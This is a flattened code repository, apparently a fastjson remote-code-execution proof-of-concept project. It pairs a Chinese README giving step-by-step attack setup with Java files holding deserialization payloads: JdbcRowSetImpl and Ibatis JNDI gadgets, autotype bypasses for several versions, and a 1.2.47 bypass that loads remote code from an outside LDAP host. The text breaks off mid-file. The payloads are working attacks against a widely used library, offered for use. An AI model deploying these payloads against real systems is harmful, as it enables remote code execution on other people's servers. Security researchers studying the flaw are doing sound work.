├── .idea ├── compiler.xml ├── copyright │ └── profiles_settings.xml ├── libraries │ ├── Maven__com_alibaba_fastjson_1_2_24.xml │ ├── Maven__com_unboundid_unboundid_ldapsdk_3_1_1.xml │ ├── Maven__commons_codec_commons_codec_1_10.xml │ ├── Maven__commons_io_commons_io_2_3.xml │ ├── Maven__commons_logging_commons_logging_1_2.xml │ ├── Maven__org_apache_xbean_xbean_naming_4_5.xml │ ├── Maven__org_springframework_spring_aop_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_beans_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_context_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_core_4_3_7_RELEASE.xml │ ├── Maven__org_springframework_spring_expression_4_3_7_RELEASE.xml │ ├── Maven__xalan_serializer_2_7_2.xml │ ├── Maven__xalan_xalan_2_7_2.xml │ └── Maven__xml_apis_xml_apis_1_3_04.xml ├── misc.xml ├── modules.xml ├── uiDesigner.xml ├── vcs.xml └── workspace.xml ├── Java_JSON反序列化之殇_看雪安全开发者峰会.pdf ├── README.md ├── myPerson.txt ├── pom.xml ├── src └── main │ └── java │ └── person │ ├── Bypass1247.java │ ├── Exploit1.java │ ├── IbatisDatasourcePoC.java │ ├── IbatisJNDIPoC.java │ ├── JdbcRowSetImplPoc.java │ ├── OtherPoC.java │ ├── Person.java │ ├── Poc.java │ ├── Poc1.java │ ├── SerializeToFlatFile.java │ ├── Test.java │ ├── Test1.java │ ├── TestFastjson.java │ ├── TestJNDI.java │ └── server │ ├── JNDIServer.java │ └── LdapServer.java ├── target ├── classes │ └── person │ │ ├── Exploit1.class │ │ ├── JdbcRowSetImplPoc.class │ │ ├── Person.class │ │ ├── Poc.class │ │ ├── Poc1.class │ │ ├── SerializeToFlatFile.class │ │ ├── Test.class │ │ ├── Test1.class │ │ ├── TestFastjson.class │ │ ├── TestJNDI.class │ │ └── server │ │ ├── JNDIServer.class │ │ ├── LdapServer$OperationInterceptor.class │ │ └── LdapServer.class ├── fastjson-poc-1.0-SNAPSHOT-jar-with-dependencies.jar ├── fastjson-poc-1.0-SNAPSHOT.jar ├── maven-archiver │ └── pom.properties └── maven-status │ └── maven-compiler-plugin │ └── compile │ └── default-compile │ ├── createdFiles.lst │ └── inputFiles.lst └── test.iml /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /.idea/copyright/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__com_alibaba_fastjson_1_2_24.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__com_unboundid_unboundid_ldapsdk_3_1_1.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_codec_commons_codec_1_10.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_io_commons_io_2_3.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__commons_logging_commons_logging_1_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_apache_xbean_xbean_naming_4_5.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_aop_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_beans_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_context_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_core_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__org_springframework_spring_expression_4_3_7_RELEASE.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__xalan_serializer_2_7_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__xalan_xalan_2_7_2.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/libraries/Maven__xml_apis_xml_apis_1_3_04.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/workspace.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 46 | 47 | 57 | 58 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 183 | 184 | 185 | 187 | 188 | 191 | 192 | 193 | 214 | 215 | 216 | 217 | 218 | true 219 | DEFINITION_ORDER 220 | 221 | 222 | 227 | 228 | 229 | 230 | 231 | 232 | 235 | 236 | 239 | 240 | 241 | 242 | 243 | 248 | 249 | 250 | 251 | 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 273 | 274 | 277 | 278 | 279 | 280 | 283 | 284 | 287 | 288 | 291 | 292 | 295 | 296 | 299 | 300 | 303 | 304 | 305 | 306 | 309 | 310 | 313 | 314 | 317 | 318 | 321 | 322 | 325 | 326 | 329 | 330 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | 340 | 341 | 342 | 343 | 344 | 345 | 346 | 347 | 348 | 349 | 350 | 351 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 364 | 365 | 378 | 379 | 380 | 381 | 384 | 385 | 398 | 399 | 400 | 401 | 404 | 405 | 418 | 419 | 420 | 421 | 424 | 425 | 438 | 439 | 440 | 441 | 444 | 445 | 458 | 459 | 460 | 465 | 466 | 473 | 474 | 475 | 488 | 489 | 490 | 491 | 496 | 510 | 511 | 512 | 513 | 514 | 515 | 516 | 517 | 522 | 540 | 547 | 548 | 549 | 550 | 551 | 552 | 569 | 570 | 591 | 604 | 605 | 614 | 618 | 619 | 620 | 627 | 630 | 632 | 633 | 634 | 635 | 636 | 637 | 638 | 639 | 640 | 641 | 642 | 643 | 644 | 645 | 646 | 647 | 661 | 662 | 663 | 664 | 665 | 666 | 667 | 668 | 669 | 670 | 671 | 672 | 686 | 687 | 688 | 689 | 690 | 691 | 692 | 693 | 694 | 695 | 696 | 697 | 708 | 709 | 710 | 720 | 721 | 722 | 739 | 740 | 741 | 742 | 743 | 750 | 751 | 752 | 753 | 754 | 755 | 756 | 757 | 758 | 759 | 777 | 784 | 785 | project 786 | 787 | 788 | 789 | 790 | 791 | 792 | 793 | 794 | 795 | 796 | 797 | 798 | 799 | 800 | 801 | 802 | 803 | 804 | 805 | 806 | 807 | 808 | 809 | 810 | 811 | 812 | 813 | 814 | 815 | 816 | 817 | 818 | 819 | 820 | 821 | 822 | 823 | 824 | 826 | 827 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 1492528164221 836 | 862 | 863 | 864 | 865 | 867 | 868 | 869 | 870 | 871 | 872 | 873 | 874 | 875 | 876 | 877 | 878 | 879 | 880 | 881 | 882 | 883 | 884 | 885 | 886 | 887 | 888 | 889 | 890 | 891 | 892 | 893 | 894 | 895 | 896 | 897 | 898 | 899 | 900 | 901 | 902 | 903 | 904 | 905 | 906 | 907 | 908 | 910 | 911 | 914 | 917 | 918 | 919 | 921 | 922 | 923 | 924 | 925 | file://$PROJECT_DIR$/src/main/java/person/SerializeToFlatFile.java 926 | 41 927 | 928 | 929 | 930 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 931 | 485 932 | 933 | 935 | 936 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/parser/deserializer/FieldDeserializer.java 937 | 84 938 | 939 | 941 | 942 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 943 | 506 944 | 945 | 947 | 948 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 949 | 129 950 | 951 | 953 | 954 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 955 | 209 956 | 957 | 959 | 960 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/parser/ParserConfig.java 961 | 590 962 | 963 | 965 | 966 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 967 | 537 968 | 969 | 971 | 972 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.33/fastjson-1.2.33-sources.jar!/com/alibaba/fastjson/parser/deserializer/FieldDeserializer.java 973 | 54 974 | 975 | 977 | 978 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/util/JavaBeanInfo.java 979 | 136 980 | 981 | 983 | 984 | file://$PROJECT_DIR$/src/main/java/person/Poc1.java 985 | 60 986 | 987 | 989 | 990 | jar://$MAVEN_REPOSITORY$/com/alibaba/fastjson/1.2.24/fastjson-1.2.24-sources.jar!/com/alibaba/fastjson/JSON.java 991 | 636 992 | 993 | 995 | 996 | jar://C:/Program Files/Java/jdk1.8.0_102/jre/lib/rt.jar!/com/sun/rowset/JdbcRowSetImpl.class 997 | 326 998 | 999 | 1001 | 1002 | file://$PROJECT_DIR$/src/main/java/person/TestJNDI.java 1003 | 40 1004 | 1005 | 1007 | 1008 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1009 | 84 1010 | 1011 | 1013 | 1014 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1015 | 98 1016 | 1017 | 1019 | 1020 | jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1021 | 372 1022 | 1023 | 1025 | 1026 | jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1027 | 323 1028 | 1029 | 1031 | 1032 | jar://$MAVEN_REPOSITORY$/com/unboundid/unboundid-ldapsdk/3.1.1/unboundid-ldapsdk-3.1.1.jar!/com/unboundid/ldap/listener/LDAPListenerClientConnection.class 1033 | 267 1034 | 1035 | 1037 | 1038 | file://$PROJECT_DIR$/src/main/java/person/TestJNDI.java 1039 | 35 1040 | 1041 | 1043 | 1044 | file://$PROJECT_DIR$/src/main/java/person/Poc.java 1045 | 37 1046 | 1047 | 1049 | 1050 | file://$PROJECT_DIR$/src/main/java/person/server/LdapServer.java 1051 | 109 1052 | 1053 | 1055 | 1056 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1057 | 70 1058 | 1059 | 1061 | 1062 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1063 | 57 1064 | 1065 | 1067 | 1068 | jar://C:/Program Files/Java/jdk1.8.0_102/src.zip!/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java 1069 | 227 1070 | 1071 | 1073 | 1074 | 1075 | 1076 | 1077 | 1079 | 1080 | 1081 | 1082 | 1085 | 1086 | 1087 | 1088 | 1089 | 1090 | 1091 | 1092 | 1093 | 1094 | 1095 | 1096 | 1097 | 1098 | 1099 | 1100 | 1101 | 1102 | 1103 | 1104 | 1105 | 1106 | 1107 | 1108 | 1109 | 1110 | 1111 | 1112 | 1113 | 1114 | 1115 | 1116 | 1117 | 1118 | 1119 | 1120 | 1121 | 1122 | 1123 | 1124 | 1125 | 1126 | 1127 | 1128 | 1129 | 1130 | 1131 | 1132 | 1133 | 1134 | 1135 | 1136 | 1137 | 1138 | 1139 | 1140 | 1141 | 1142 | 1143 | 1144 | 1145 | 1146 | 1147 | 1148 | 1149 | 1150 | 1151 | 1152 | 1153 | 1154 | 1155 | 1156 | 1157 | 1158 | 1159 | 1160 | 1161 | 1162 | 1163 | 1164 | 1165 | 1166 | 1167 | 1168 | 1169 | 1170 | 1171 | 1172 | 1173 | 1174 | 1175 | 1176 | 1177 | 1178 | 1179 | 1180 | 1181 | 1182 | 1183 | 1184 | 1185 | 1186 | 1187 | 1188 | 1189 | 1190 | 1191 | 1192 | 1193 | 1194 | 1195 | 1196 | 1197 | 1198 | 1199 | 1200 | 1201 | 1202 | 1203 | 1204 | 1205 | 1206 | 1207 | 1208 | 1209 | 1210 | 1211 | 1212 | 1213 | 1214 | 1215 | 1216 | 1217 | 1218 | 1219 | 1220 | 1221 | 1222 | 1223 | 1224 | 1225 | 1226 | 1227 | 1228 | 1229 | 1230 | 1231 | 1232 | 1233 | 1234 | 1235 | 1236 | 1237 | 1238 | 1239 | 1240 | 1241 | 1242 | 1243 | 1244 | 1245 | 1246 | 1247 | 1248 | 1249 | 1250 | 1251 | 1252 | 1253 | 1254 | 1255 | 1256 | 1257 | 1258 | 1259 | 1260 | 1261 | 1262 | 1263 | 1264 | 1265 | 1266 | 1267 | 1268 | 1269 | 1270 | 1271 | 1272 | 1273 | 1274 | 1275 | 1276 | 1277 | 1278 | 1279 | 1280 | 1281 | 1282 | 1283 | 1284 | 1285 | 1286 | 1287 | 1288 | 1289 | 1290 | 1291 | 1292 | 1293 | 1294 | 1295 | 1296 | 1297 | 1298 | 1299 | 1300 | 1301 | 1302 | 1303 | 1304 | JAVA 1305 | javax.xml.transform.Templates 1306 | 1307 | javax.xml.transform.Templates 1308 | 1309 | 1310 | 1311 | 1312 | 1313 | 1314 | All 1315 | private 1316 | 1317 | 1318 | 1319 | 1320 | 1321 | 1322 | JAVA 1323 | com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 1324 | 1325 | javax.xml.transform.Templates 1326 | com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 1327 | java.io.Serializable 1328 | 1329 | 1330 | 1331 | 1332 | 1333 | 1334 | Constructors 1335 | Properties 1336 | Methods 1337 | 1338 | All 1339 | private 1340 | 1341 | 1342 | 1343 | 1344 | 1345 | 1346 | 1347 | 1348 | 1349 | 1350 | 1351 | 1352 | 1353 | 1354 | 1355 | 1356 | 1357 | 1358 | 1359 | 1360 | 1361 | 1362 | 1363 | 1364 | 1365 | 1366 | 1367 | 1368 | 1369 | 1370 | 1371 | 1372 | 1373 | 1374 | 1375 | 1376 | 1377 | 1378 | 1379 | 1380 | 1381 | 1382 | 1383 | 1384 | 1385 | 1386 | 1387 | 1388 | 1389 | 1390 | 1391 | 1392 | 1393 | 1394 | 1395 | 1396 | 1397 | 1398 | 1399 | 1400 | 1401 | 1402 | 1403 | 1404 | 1405 | 1406 | 1407 | 1408 | 1409 | 1410 | 1411 | 1412 | 1413 | 1414 | 1415 | 1416 | 1417 | 1418 | 1419 | 1420 | 1421 | 1422 | 1423 | 1424 | 1425 | 1426 | 1427 | 1428 | 1429 | 1430 | 1431 | 1432 | 1433 | 1434 | 1435 | 1436 | 1437 | 1438 | 1439 | 1440 | 1441 | 1442 | 1443 | 1444 | 1445 | 1446 | 1447 | 1448 | 1449 | 1450 | 1451 | 1452 | 1453 | 1454 | 1455 | 1456 | 1457 | 1458 | 1459 | 1460 | 1461 | 1462 | 1463 | 1464 | 1465 | 1466 | 1467 | 1468 | 1469 | 1470 | 1471 | 1472 | 1473 | 1474 | 1475 | 1476 | 1477 | 1478 | 1479 | 1480 | 1481 | 1482 | 1483 | 1484 | 1485 | 1486 | 1487 | 1488 | 1489 | 1490 | 1491 | 1492 | 1493 | 1494 | 1495 | 1496 | 1497 | 1498 | 1499 | 1500 | 1501 | 1502 | 1503 | 1504 | 1505 | 1506 | 1507 | 1508 | 1509 | 1510 | 1511 | 1512 | 1513 | 1514 | 1515 | 1516 | 1517 | 1518 | 1519 | 1520 | 1521 | 1522 | 1523 | 1524 | 1525 | 1526 | 1527 | 1528 | 1529 | 1530 | 1531 | 1532 | 1533 | 1534 | 1535 | 1536 | 1537 | 1538 | 1539 | 1540 | 1541 | 1542 | 1543 | 1544 | 1545 | 1550 | 1551 | 1552 | 1553 | 1554 | 1555 | No facets are configured 1556 | 1557 | 1562 | 1563 | 1564 | 1565 | 1566 | 1567 | 1568 | 1573 | 1574 | 1575 | 1576 | 1577 | 1578 | 1.8 1579 | 1580 | 1585 | 1586 | 1587 | 1588 | 1589 | 1590 | test 1591 | 1592 | 1598 | 1599 | 1600 | 1601 | 1602 | 1603 | 1.8 1604 | 1605 | 1610 | 1611 | 1612 | 1613 | 1614 | 1615 | Maven: com.alibaba:fastjson:1.2.24 1616 | 1617 | 1622 | 1623 | 1624 | 1625 | 1626 | 1627 | 1628 | 1631 | -------------------------------------------------------------------------------- /Java_JSON反序列化之殇_看雪安全开发者峰会.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/Java_JSON反序列化之殇_看雪安全开发者峰会.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | fastjson remote code execute poc 2 | 直接用intellij IDEA打开即可 3 | 首先编译得到Test.class，然后运行Poc.java 4 | 5 | 支持jdk1.7，1.8 6 | 该poc只能运行在fastjson-1.2.22到fastjson-1.2.24版本区间，因为fastjson从1.2.22版本才开始引入SupportNonPublicField 7 | 8 | 详情分析：http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ 9 | 基于JdbcRowSetImpl的Fastjson RCE PoC构造与分析：http://xxlegend.com/2017/12/06/%E5%9F%BA%E4%BA%8EJdbcRowSetImpl%E7%9A%84Fastjson%20RCE%20PoC%E6%9E%84%E9%80%A0%E4%B8%8E%E5%88%86%E6%9E%90/ 10 | 其他参考：http://xxlegend.com/2017/11/23/Java%20JSON%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8B%E6%AE%87-%E7%9C%8B%E9%9B%AA%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91%E8%80%85%E5%B3%B0%E4%BC%9A/ 11 | 12 | 基于JNDI的poc，JdbcRowSetImplPoc.java 13 | 14 | 1，在远程服务器上运行server中的JNDIServer或者LdapServer 15 | 2，将Exploit.class放到上述服务指定的位置，一般都是web服务目录下 16 | 3，执行JdbcRowSetImplPoc.java 17 | 18 | 19 | ## 注意事项： 20 | 启动JNDIServer或者LdapServer的时候 factoryLocation 一定得是ip后带斜杠，这个斜杠少不得，少了的话到web服务器的请求就变成了GET / 而不是正常的GET /Exploit.class，正常的示例如下： 21 | 224.206.180.18 - - [07/Dec/2017:02:11:15 -0500] "GET /Exploit.class HTTP/1.1" 200 860 "-" "Java/1.8.0_102" 22 | 23 | -------------------------------------------------------------------------------- /myPerson.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shengqi158/fastjson-remote-code-execute-poc/8b7ec3235b8d1b366cd8b653504223f555666479/myPerson.txt -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | com.xxlengend 8 | fastjson-poc 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 13 | 14 | org.apache.maven.plugins 15 | maven-assembly-plugin 16 | 2.5.5 17 | 18 | 24 | 25 | jar-with-dependencies 26 | 27 | 28 | 29 | 30 | make-assembly 31 | package 32 | 33 | single 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | commons-codec 44 | commons-codec 45 | 1.10 46 | 47 | 48 | 49 | com.alibaba 50 | fastjson 51 | 1.2.24 52 | 53 | 54 | com.unboundid 55 | unboundid-ldapsdk 56 | 3.1.1 57 | 58 | 59 | 60 | commons-io 61 | commons-io 62 | 2.3 63 | 64 | 65 | xalan 66 | xalan 67 | 2.7.2 68 | 69 | 70 | 71 | 72 | org.springframework 73 | spring-beans 74 | 4.3.7.RELEASE 75 | 76 | 77 | 78 | org.springframework 79 | spring-context 80 | 4.3.7.RELEASE 81 | 82 | 83 | 84 | org.springframework 85 | spring-aop 86 | 4.3.7.RELEASE 87 | 88 | 89 | 90 | org.apache.xbean 91 | xbean-naming 92 | 4.5 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /src/main/java/person/Bypass1247.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * Created on 2019-07-21 7 | * 用于bypass 1.2.47，适用于低于1.2.48的版本，此poc绕过了fastjson的autotype机制，无需开启autotype，直接一招毙命 8 | */ 9 | public class Bypass1247 { 10 | public static void main(String[] args){ 11 | String payload = "{\"cache\":{\"@type\":\"java.lang.Class\",\"val\":\"L\u0063om.sun.rowset.JdbcRowSetImpl;\"}," 12 | + "\"value\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," 13 | + "\"dataSourceName\":\"ldap://xxlegend.com/Exploit1\",\"autoCommit\":true}}"; 14 | JSON.parseObject(payload, Object.class); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /src/main/java/person/Exploit1.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | /** 4 | * Created by liaoxinxi on 2017-9-4. 5 | */ 6 | public class Exploit1 { 7 | public Exploit1(){ 8 | try{ 9 | Runtime.getRuntime().exec("calc"); 10 | }catch(Exception e){ 11 | e.printStackTrace(); 12 | } 13 | } 14 | public static void main(String[] argv){ 15 | Exploit1 e = new Exploit1(); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /src/main/java/person/IbatisDatasourcePoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | 7 | public class IbatisDatasourcePoC { 8 | public static void main(String[] argv) { 9 | //testUnicode(); 10 | testJndiDataSourceFactory(); 11 | } 12 | 13 | public static void testJndiDataSourceFactory() { 14 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 15 | //fastjson 1.2.45 bypass,https://github.com/alibaba/fastjson/releases/tag/1.2.45 16 | String payload = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"rmi://localhost:1099/Exploit\"}}"; 17 | JSON.parse(payload); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /src/main/java/person/IbatisJNDIPoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | /** 7 | * Created by liaoxinxi on 2018-4-24. 8 | */ 9 | public class IbatisJNDIPoC { 10 | public static void main(String[] argv) { 11 | //testUnicode(); 12 | testJndiDataSourceFactory(); 13 | } 14 | 15 | public static void testJndiDataSourceFactory() { 16 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 17 | String payload = "{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"rmi://localhost:1099/Exploit\"}}"; 18 | JSON.parse(payload); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/person/JdbcRowSetImplPoc.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | 5 | /** 6 | * Created by liaoxinxi on 2017-9-4. 7 | */ 8 | public class JdbcRowSetImplPoc { 9 | public static void main(String[] argv){ 10 | testJdbcRowSetImpl(); 11 | } 12 | public static void testJdbcRowSetImpl(){ 13 | String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:389/Exploit\"," + 14 | " \"autoCommit\":true}"; 15 | /* String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 16 | " \"autoCommit\":true}";*/ 17 | JSON.parse(payload); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/person/OtherPoC.java: -------------------------------------------------------------------------------- 1 | package person; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | 6 | /** 7 | * Created by liaoxinxi on 2018-4-24. 8 | */ 9 | public class OtherPoC { 10 | public static void main(String[] argv){ 11 | //testUnicode(); 12 | testJdbcRowSetImpl(); 13 | } 14 | public static void testJdbcRowSetImpl() { 15 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 16 | //1.2.41 bypass 17 | String payload = "{\"@type\":\"Lcom.sun.rowset.RowSetImpl;\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 18 | " \"autoCommit\":true}"; 19 | //1.2.43 20 | String payload3 = 